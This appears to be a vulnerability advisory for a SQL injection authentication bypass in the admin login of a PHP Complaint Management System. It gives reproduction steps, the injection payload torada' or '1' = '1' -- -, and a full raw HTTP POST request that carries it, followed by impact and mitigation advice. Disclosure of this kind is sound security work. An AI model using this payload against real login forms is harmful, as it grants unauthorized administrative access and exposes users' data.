The admin login form of the Complaint Management System application is vulnerable to SQL injection. An attacker can exploit this vulnerability to bypass authentication and gain unauthorized access to the admin panel.
Open the site http://localhost/Complaint Management System/index.html
Navigate to the admin login page: http://localhost/Complaint Management System/admin/
Enter the payload torada' or '1' = '1' -- - into the username field.
Enter any password (e.g., "aa") into the password field.
Submit the form.
Video for the success of the attack
POST /Complaint%20Management%20System/admin/ HTTP/1.1
Host: localhost
Content-Length: 66
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="121", "Not A(Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
Origin: <http://localhost>
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: <http://localhost/Complaint%20Management%20System/admin/>
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=60210har8tikk0mj82thd19k66
Connection: close
username=torada%27+or+%271%27+%3D+%271%27+--+-&password=aa&submit=
Successful exploitation of this vulnerability allows an attacker to gain unauthorized access to the admin panel, potentially leading to data leakage, manipulation, or other malicious activities.
To mitigate this vulnerability, sanitize and validate user inputs, and use prepared statements or parameterized queries to prevent SQL injection attacks.